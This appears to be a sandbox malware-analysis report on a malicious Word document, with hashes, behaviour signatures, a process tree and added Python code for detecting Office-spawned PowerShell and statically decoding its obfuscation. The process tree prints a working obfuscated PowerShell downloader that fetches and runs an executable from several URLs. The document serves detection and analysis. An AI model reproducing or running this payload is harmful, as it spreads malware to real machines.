Analysis
max time kernel: 136s
max time network: 126s
platform: windows10-2004_x64
resource: win10v2004-20240426-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
submitted: 19-05-2024 10:18
Behavioral task: behavioral1
Sample: 59e447e4f4dc430a2fa225dda10aeb20_JaffaCakes118.doc
Resource: win7-20231129-en
Behavioral task: behavioral2
Sample: 59e447e4f4dc430a2fa225dda10aeb20_JaffaCakes118.doc
Resource: win10v2004-20240426-en
General
Target: 59e447e4f4dc430a2fa225dda10aeb20_JaffaCakes118.doc
Size: 206KB
MD5: 59e447e4f4dc430a2fa225dda10aeb20
SHA1: 1582f27a27a5ceb1066e50e2ded5088b2dd9c118
SHA256: 666edb5d9868c952bd0fa5ed0741e23cd81f0c74832c73186fc6e1304d4e39e1
SHA512: 2c3b047038e2af63a45eb0a429f0a3350f4faf42c9be0e70ec82997ac0c50e6466341da5c1347458f995d835a7a3e3899094c7ad1b38e58e79facc39acd4e3f3
SSDEEP: 3072:wH9nBf4SuEjAhmAMOc7kkkko1rkGuF3tBInxGGq5fyXJm9YBmjDsl5zZMr:wFVeEsjdXRC3jexGG6kYWofsx0
Malware Config
Signatures
Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
  description: Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process
  pid: 4440  pid_target: 1996  process: PowersHELL.exe  target process: WINWORD.EXE

Blocklisted process makes network request (5 IoCs)
Processes:
  flow  pid   process
  21    4440  PowersHELL.exe
  55    4440  PowersHELL.exe
  82    4440  PowersHELL.exe
  109   4440  PowersHELL.exe
  111   4440  PowersHELL.exe

Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes:
  description        ioc                                                                                process
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz                 WINWORD.EXE
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  WINWORD.EXE
  Key opened         \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0                      WINWORD.EXE

Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes:
  description        ioc                                                       process
  Key opened         \REGISTRY\MACHINE\Hardware\Description\System\BIOS        WINWORD.EXE
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily  WINWORD.EXE
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU     WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener (2 IoCs)
Processes:
  pid   process
  1996  WINWORD.EXE
  1996  WINWORD.EXE

Suspicious behavior: EnumeratesProcesses (2 IoCs)
Processes:
  pid   process
  4440  PowersHELL.exe
  4440  PowersHELL.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
Processes:
  description              pid   process
  Token: SeDebugPrivilege  4440  PowersHELL.exe

Suspicious use of SetWindowsHookEx (8 IoCs)
Processes:
  pid   process
  1996  WINWORD.EXE
  1996  WINWORD.EXE
  1996  WINWORD.EXE
  1996  WINWORD.EXE
  1996  WINWORD.EXE
  1996  WINWORD.EXE
  1996  WINWORD.EXE
  1996  WINWORD.EXE

Suspicious use of WriteProcessMemory (2 IoCs)
Processes:
  description                       pid   process      target process
  PID 1996 wrote to memory of 4440  1996  WINWORD.EXE  PowersHELL.exe
  PID 1996 wrote to memory of 4440  1996  WINWORD.EXE  PowersHELL.exe
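The "unexpected child process" signature above is the parent/child relationship a host-based detection should catch on its own, without waiting for the sandbox. The Python below is an added example and not part of this report: it runs that check over constructed Sysmon-style process-creation records (the field names, the explorer.exe parent and the benign third event are assumptions; the two malicious records mirror the PIDs and image paths in this report, with the PowerShell command line shortened). It compares image names case-insensitively, because the sample launched the interpreter as `PowersHELL.exe`, and it scores the command line for the obfuscation tokens visible in the process tree (the `$ShellId[1]+$ShellId[13]+'X'` trick that spells `iex`, `-bxor`, `[char]`, chained `-split`, and tampering with `$OFS`).

```python
"""Flag Office-spawned script hosts and obfuscated PowerShell from process-creation records."""
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Parents that should not launch script interpreters, and the interpreters that,
# when spawned from them, usually mean a macro or exploit fired.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}

# Tokens typical of hand-rolled PowerShell obfuscation; each value is a case-insensitive regex.
OBFUSCATION_MARKERS = {
    "shellid-iex": r"\$shellid\[",                               # $ShellId[1]+$ShellId[13]+'X' == 'iex'
    "xor-decode":  r"-bxor",
    "char-cast":   r"\[char\]",
    "split-chain": r"-split\s*'[^']'\s*-split\s*'[^']'",         # two or more -split delimiters in a row
    "ofs-tamper":  r"variable:ofs|\bset\s+'?ofs",                # $OFS set to '' so [string] joins chars
}


@dataclass(frozen=True)
class ProcessEvent:
    pid: int
    image: str
    command_line: str
    parent_pid: int
    parent_image: str


def image_name(path: str) -> str:
    """Lower-cased basename, so 'PowersHELL.exe' compares equal to 'powershell.exe'."""
    return PureWindowsPath(path).name.lower()


def analyse(ev: ProcessEvent) -> list:
    """Return the reasons this event is suspicious (empty list if none)."""
    reasons = []
    parent, child = image_name(ev.parent_image), image_name(ev.image)
    if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
        reasons.append(f"unexpected-child:{parent}->{child}")
    hits = [name for name, rx in OBFUSCATION_MARKERS.items()
            if re.search(rx, ev.command_line, re.IGNORECASE)]
    if len(hits) >= 2:               # one marker alone is common in admin scripts
        reasons.append("obfuscated-cmdline:" + ",".join(hits))
    return reasons


def scan(events) -> dict:
    """Map pid -> reasons for every event that trips at least one check."""
    findings = {}
    for ev in events:
        reasons = analyse(ev)
        if reasons:
            findings[ev.pid] = reasons
    return findings


# Constructed sample records (not from a real log). Events 1996 and 4440 mirror this report;
# the command line of 4440 is shortened to a few tokens of the original blob.
SAMPLE_EVENTS = [
    ProcessEvent(1996, r"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE",
                 r'"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n '
                 r'"C:\Users\Admin\AppData\Local\Temp\59e447e4f4dc430a2fa225dda10aeb20_JaffaCakes118.doc" /o ""',
                 1234, r"C:\Windows\explorer.exe"),
    ProcessEvent(4440, r"C:\Windows\System32\WindowsPowerShell\v1.0\PowersHELL.exe",
                 r'''PowersHELL .( $shElliD[1]+$ShEllId[13]+'X')( "$(SEt-iteM 'vaRIabLe:oFS' '')"+ '''
                 r'''[strINg]('30Y84N127S125w7' -split 'w' -split 'Y'|foREaCH-OBjEct{ [CHar] ( $_-BXOr 0x3a )}) '''
                 r'''+" $(SEt 'ofs' ' ')")''',
                 1996, r"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"),
    ProcessEvent(5100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -NoProfile -File C:\scripts\inventory.ps1",
                 1234, r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for pid, reasons in scan(SAMPLE_EVENTS).items():
        print(pid, reasons)
```

Only PID 4440 is reported, for both reasons; the benign PowerShell launched from explorer.exe with a plain `-File` argument trips neither check. In production the same two checks map directly onto Sysmon Event ID 1 (`ParentImage`, `Image`, `CommandLine`) or Security Event 4688 with command-line auditing enabled.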
Processes
1. C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE (PID 1996)
   Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\59e447e4f4dc430a2fa225dda10aeb20_JaffaCakes118.doc" /o ""
   - Checks processor information in registry
   - Enumerates system info in registry
   - Suspicious behavior: AddClipboardFormatListener
   - Suspicious use of SetWindowsHookEx
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\System32\WindowsPowerShell\v1.0\PowersHELL.exe (PID 4440, child of PID 1996)
      Command line: PowersHELL .( $shElliD[1]+$ShEllId[13]+'X')( "$(SEt-iteM 'vaRIabLe:oFS' '')"+ [strINg]('30Y84N127S125w7<84Y95N77R23j85S88N80%95w89N78%26N116j95K78w20<109K95<88R121<86R83K95K84j78R1S30S112<83S81R7K29N82w78R78R74K0S21Y21%77w77w77K20K67w95S78j91R84%85R78w82%95N72N73j78%95w76Y95K20S89N85S87S21j98<73N12R110<106w77R84j123%123N112S21S122S82w78j78R74Y0N21<21%92S86<95K77K95S72K20m74R86j21<74K79m88K21m73%3Y3%15K15m12N87%21%122S82S78<78Y74Y0Y21Y21Y77w77S77K20w82%85K78N95<86K89Y91K74N83w78w91R86m20<72N79S21N92m12%124m120<112Y126w21w122R82<78w78j74R0Y21K21<94S89%20%91w87S95w93Y78Y20Y89S85K87%21w77K74<23j89N85Y84%78S95Y84S78Y21j85m121K14Y93N67N14N91Y125R118m21%122<82m78m78%74R0%21K21N77K77K77m20j91Y72R87<91N84<83w78%85j79<72<20K89<85S87K21R81m79j116Y117m75K115w21Y29Y20<105S74m86m83S78S18m29m122K29%19K1S30j82m117j98R26S7K26Y29j8%3<11N29S1K30S86w104Y75K7K30R95m84w76%0S78N95%87w74N17<29N102m29j17S30N82N117w98S17R29%20Y95%66<95S29j1m92Y85%72%95R91m89S82<18%30m126Y98K107%26<83j84w26<30<112S83R81w19j65R78N72K67K65w30j84<127R125N20N126K85m77R84N86<85<91w94Y124N83Y86R95%18Y30R126K98K107S22j26K30N86R104K75K19K1S105j78%91S72m78w23w106w72N85R89R95S73S73N26S30K86Y104%75<1%88S72Y95N91S81S1K71N89w91<78K89N82%65N71<71'-split 'w' -split 'Y'-sPlIt 'K' -sPlIT '<'-sPlIt 'N' -sPLiT 's'-split'r'-SpLit '%' -SPlit 'M'-SPlit 'J'|foREaCH-OBjEct{ [CHar] ( $_-BXOr 0x3a )}) +" $(SEt 'ofs' ' ')")
      - Process spawned unexpected child process
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
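The PowersHELL.exe command line above is a single-layer encoding: the quoted blob of numbers is cut on ten delimiter characters with chained `-split` (a case-insensitive regex split, so `'s'`, `'r'`, `'M'` and `'J'` also cut on `S`, `R`, `m` and `j`), each piece is XORed with 0x3a and cast to `[char]`, and `$OFS` is set to the empty string so `[string]` joins the characters without separators. `$ShellId` is the constant `Microsoft.PowerShell`, so `$shElliD[1]+$ShEllId[13]+'X'` is `iex`, which then executes the result. The Python below is an added example, not part of this report or of the sample, that reproduces those steps statically so the script can be read without running it; it only assumes the blob and delimiters copied from the command line.

```python
"""Static decoder for the -split / -bxor PowerShell obfuscation in the process tree above."""
import re
from urllib.parse import urlsplit

# The quoted number blob, copied verbatim from the PowersHELL.exe command line in this report.
OBFUSCATED = (
    "30Y84N127S125w7<84Y95N77R23j85S88N80%95w89N78%26N116j95K78w20<109K95<88R121<86R83K95K84j78R1S30S112"
    "<83S81R7K29N82w78R78R74K0S21Y21%77w77w77K20K67w95S78j91R84%85R78w82%95N72N73j78%95w76Y95K20S89N85S87"
    "S21j98<73N12R110<106w77R84j123%123N112S21S122S82w78j78R74Y0N21<21%92S86<95K77K95S72K20m74R86j21<74K79"
    "m88K21m73%3Y3%15K15m12N87%21%122S82S78<78Y74Y0Y21Y21Y77w77S77K20w82%85K78N95<86K89Y91K74N83w78w91R86"
    "m20<72N79S21N92m12%124m120<112Y126w21w122R82<78w78j74R0Y21K21<94S89%20%91w87S95w93Y78Y20Y89S85K87%21w"
    "77K74<23j89N85Y84%78S95Y84S78Y21j85m121K14Y93N67N14N91Y125R118m21%122<82m78m78%74R0%21K21N77K77K77m20"
    "j91Y72R87<91N84<83w78%85j79<72<20K89<85S87K21R81m79j116Y117m75K115w21Y29Y20<105S74m86m83S78S18m29m122"
    "K29%19K1S30j82m117j98R26S7K26Y29j8%3<11N29S1K30S86w104Y75K7K30R95m84w76%0S78N95%87w74N17<29N102m29j17"
    "S30N82N117w98S17R29%20Y95%66<95S29j1m92Y85%72%95R91m89S82<18%30m126Y98K107%26<83j84w26<30<112S83R81w"
    "19j65R78N72K67K65w30j84<127R125N20N126K85m77R84N86<85<91w94Y124N83Y86R95%18Y30R126K98K107S22j26K30N86"
    "R104K75K19K1S105j78%91S72m78w23w106w72N85R89R95S73S73N26S30K86Y104%75<1%88S72Y95N91S81S1K71N89w91<78K"
    "89N82%65N71<71"
)

# Every -split argument in the command line. PowerShell's -split is a case-insensitive regex
# split, so one character class with IGNORECASE is equivalent to the ten chained splits.
DELIMITERS = "wYK<NsrMJ%"
XOR_KEY = 0x3A                      # from "$_ -BXOr 0x3a"


def decode_split_xor(blob: str, delimiters: str = DELIMITERS, key: int = XOR_KEY) -> str:
    """Split on the delimiters, XOR each decimal token with the key, join with no separator ($OFS='')."""
    tokens = re.split("[" + re.escape(delimiters) + "]", blob, flags=re.IGNORECASE)
    return "".join(chr(int(t) ^ key) for t in tokens if t)


def extract_urls(script: str) -> list:
    """The decoded script keeps its download URLs in one '@'-joined string followed by .Split('@')."""
    m = re.search(r"'([^']*)'\.Split\('@'\)", script)
    return m.group(1).split("@") if m else []


def extract_hosts(script: str) -> list:
    """Hostnames to block or hunt for, derived from the decoded URL list."""
    return sorted({urlsplit(u).hostname for u in extract_urls(script)})


if __name__ == "__main__":
    decoded = decode_split_xor(OBFUSCATED)
    print(decoded)
    for url in extract_urls(decoded):
        print("URL:", url)
    print("hosts:", extract_hosts(decoded))
```

Decoded, the script creates a `Net.WebClient`, splits five `http://` URLs out of an `@`-joined string, and for each one calls `DownloadFile` to `$env:temp\291.exe` followed by `Start-Process` on that path, breaking after the first download that does not throw. Five attempts is consistent with the five network flows listed under "Blocklisted process makes network request", and no child of PowersHELL.exe appears in the process tree. Running the decoder never evaluates the payload; the extracted hostnames are what go into a blocklist or a retro-hunt over proxy logs.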
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 114B
MD5: e89f75f918dbdcee28604d4e09dd71d7
SHA1: f9d9055e9878723a12063b47d4a1a5f58c3eb1e9
SHA256: 6dc9c7fc93bb488bb0520a6c780a8d3c0fb5486a4711aca49b4c53fac7393023
SHA512: 8df0ab2e3679b64a6174deff4259ae5680f88e3ae307e0ea2dfff88ec4ba14f3477c9fe3a5aa5da3a8e857601170a5108ed75f6d6975958ac7a314e4a336aed0

Filesize: 245KB
MD5: f883b260a8d67082ea895c14bf56dd56
SHA1: 7954565c1f243d46ad3b1e2f1baf3281451fc14b
SHA256: ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353
SHA512: d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82